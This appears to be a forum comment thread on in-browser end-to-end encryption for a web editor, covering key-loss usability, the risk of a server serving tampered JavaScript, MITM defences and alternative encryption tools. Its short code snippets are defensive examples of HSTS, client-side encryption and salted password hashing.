This is not a matter of "convenience"... Apple does not want a million customers crying at the Genius Bar over the permanent loss of a lifetime of photo memories because they lost their key, ok? You have to design systems expecting that normal people will lose their key at least once in their life. Have you ever lost the keys to your home? For most people, if you offered to improve the security of their home at the cost of incinerating the house if they lose their key, that would not on balance be a good default setup. Maybe for their safety deposit box it would, and only in cases where they'd rather destroy the contents than let them get into the wrong hands. But certainly it's not a one-size-fits-all good default config in all cases.


The customers have spoken, and they don't care.

Witness the popularity of Facebook and tell me the average person cares about privacy.


"All data, over time, approaches deleted, or public."

So which one is it in this case?

I think if you're offering something that isn't actually zero knowledge, then the way to create trust is to use something our societies invented long before web apps: legally binding contracts that give sensible privacy guarantees and support a viable business model.

I fear that's the best we will ever be able to do when it comes to web apps that do more than just backup or data transfer.


I did something similar* with CKEditor and the id+key after the "#" like 3-4 years back when I was learning about real time and cryptography.

There were a few practical problems that could not be easily resolved, the main one being that the server could send a different JavaScript payload (by modifying the HTML src) that leaks everything for specific clients, and they wouldn't even know.

The most reasonable solution would be a plugin of sorts that freezes the front-end code and checks that the HTML+JavaScript has not been modified since last time, but this wouldn't be practical and has a totally different set of problems.

These scenarios could happen if we consider real-world conditions (imperfect/bad actors):

- Rogue hosting or admin: someone who controls the server decides to change the JavaScript. They are smart enough to change the checksum in the <script> so things still validate.

- Cracked ("hacked"): there is a vulnerability in some part of the stack and the JavaScript gets changed without the server admins knowing.

- MITM on a badly configured server that accepts "http:" instead of "https:" while the user connects through a public network. Actually, the fact that it redirects HTTP to HTTPS has its own set of problems for the people who might need this: http://security.stackexchange.com/q/44849/9161

Did you solve this? If so, how?

*I did the proof of concept mixing front end with back end, and never fully ported it to the front end because of the problems explained above.


For the MITM part, I can think of:

- Send the HSTS header from your code, instead of relying on the server.

- Drop the connection if it is not secure. This breaks a reverse-proxy setup, though.
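A sketch of the first point, assuming a bare Node.js HTTPS server (certificate paths are placeholders):

  import * as https from "https";
  import { readFileSync } from "fs";

  https.createServer(
    { key: readFileSync("key.pem"), cert: readFileSync("cert.pem") },
    (req, res) => {
      // Ask the browser to insist on HTTPS for a year, subdomains included.
      res.setHeader("Strict-Transport-Security", "max-age=31536000; includeSubDomains");
      res.end("hello over TLS");
    }
  ).listen(443);

Note that HSTS only protects visits after the first one, unless the domain is on the browser preload list.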


Tangentially related is my open-source project, an authenticated encryption filesystem: https://github.com/netheril96/securefs.


The whole idea of basing a core security guarantee (provable 'no knowledge' on the server side) on an unreliable mechanism (in-browser cryptography) feels really wrong.

There are many services which attempt to base their security on in-browser JavaScript cryptography.

What would be really valuable is not building Yet Another Service That Helps Privacy (but really doesn't), but investing effort into building trusted execution models within the browser that any website could utilize.

Secure apps would follow instantly.


I might be a bit late to the party with this one but I just found https://github.com/duplicati/duplicati and it seems to be a very nice solution for encrypted cloud backups.

There's also https://github.com/ncw/rclone if you would rather do it more like rsync.


... and Cryptomator. It's open source and has clients for Windows, macOS, Linux, iOS and Android.

https://cryptomator.org/


Two components are left: 1) storage of the credentials that encrypt the vault (see my profile for a solution); 2) a browser extension that verifies hashes of every HTML response.


This looks a lot like monod

https://monod.lelab.tailordev.fr/

I've been using it as a private, sharable wiki for quite a while now.


The usability implications of not being able to access information if you lose track of the link will be enough to ensure this never takes off, let alone the vast security holes.


Encrypting locally before uploading to the cloud is probably the best solution. That way unencrypted data never leaves your local device.
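In a web app the same principle looks roughly like this; a sketch with the Web Crypto API, where the upload endpoint is a placeholder:

  async function encryptAndUpload(file: File): Promise<CryptoKey> {
    const key = await crypto.subtle.generateKey(
      { name: "AES-GCM", length: 256 }, true, ["encrypt", "decrypt"]);
    const iv = crypto.getRandomValues(new Uint8Array(12));
    const ciphertext = await crypto.subtle.encrypt(
      { name: "AES-GCM", iv }, key, await file.arrayBuffer());
    // Only the IV and ciphertext leave the device; the key stays local.
    await fetch("https://storage.example.com/upload", {
      method: "PUT",
      body: new Blob([iv, ciphertext]),
    });
    return key; // export and back it up locally, or you lose the data with it
  }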

You can do this with an app like VeraCrypt https://veracrypt.codeplex.com for DropBox or SyncDocs https://syncdocs.com for Google Drive.

Relying on cloud providers to protect your data is not a great idea - just ask Hillary Clinton about Podesta. Adding a separate layer of security and another means of authentication is more secure.


It's already pretty popular, similar to Mega.co.nz.


What's the source for how much the information is worth in dollars?


And how often? Is this a one-time sale of information or a monthly exchange? I was really curious about this piece of context as well.


Tresorit is way ahead of these guys...


Two things:

1. Don't just use cryptography; understand how zero-knowledge encryption works. These 1-minute animated explainer videos do a good job: http://gun.js.org/explainers/data/security.html

2. We used the URL-hash method they mention in the CryptPad article to create a beautifully simple P2P payment system (direct bank-to-bank deposits, no fees), completely end-to-end encrypted: checkard.com

It works, and it's a lot easier to build than people may think or expect!


I haven't bothered with the video, but the website is not only wrong but grossly ungrammatical.

"Most websites you use today have fake security. When you log onto their service, your password gets sent up to their proprietary servers. There they check to see if it is correct and grant you access to YOUR data."

"Sure, their servers might be in a top secret location. But the problem is that they know your password. Which means any bad actor, like a rogue employee, a hacker, or a government agency can snoop on your data without you knowing."

This manages both to misstate how good password practices (hashes and salts) work [1] and to miss their ultimate failure mode: your data is still sitting on someone else's server unencrypted. The password, however well hashed or salted, isn't proof against a warrant, a hack, insider action, or poor media disposal.
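(For reference, salted password hashing is only a few lines; a sketch with Node.js built-ins and commonly recommended primitives, not any particular site's setup:)

  import { randomBytes, scryptSync, timingSafeEqual } from "crypto";

  function hashPassword(pw: string): string {
    const salt = randomBytes(16); // unique per user, stored with the hash
    return salt.toString("hex") + ":" + scryptSync(pw, salt, 64).toString("hex");
  }

  function verifyPassword(pw: string, stored: string): boolean {
    const [saltHex, hashHex] = stored.split(":");
    const hash = scryptSync(pw, Buffer.from(saltHex, "hex"), 64);
    return timingSafeEqual(hash, Buffer.from(hashHex, "hex"));
  }

None of which, as noted, protects the data itself once it sits server-side in the clear.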

But given the elementary errors in the text, I'm pretty confident the video is not worth watching.

________________________________

Notes:

1. See e.g., https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet


We talk about hashes and salts in another episode. You can't cover everything in one minute, especially when you want a 5-year-old to be able to understand as well.

The text is the transcript, which is intentionally conversational not a formal essay. Maybe it is a good idea for us to change it though.

If your philosophy in life is to pass on learning ideas because you are offended by a grammar error, then you are probably right to skip out; the video isn't targeted at people like that.


Grammar is an honest signal. It's not surefire, but the scope of errors here portends quite poorly for the material.

Given issues of the modern Web, including the absolute deluge of information, finding credible and worthwhile sources is itself a challenge.

Communication -- writing or otherwise -- should be done for the benefit of the reader or audience, to borrow from another item currently on HN (concerning writing manuals).



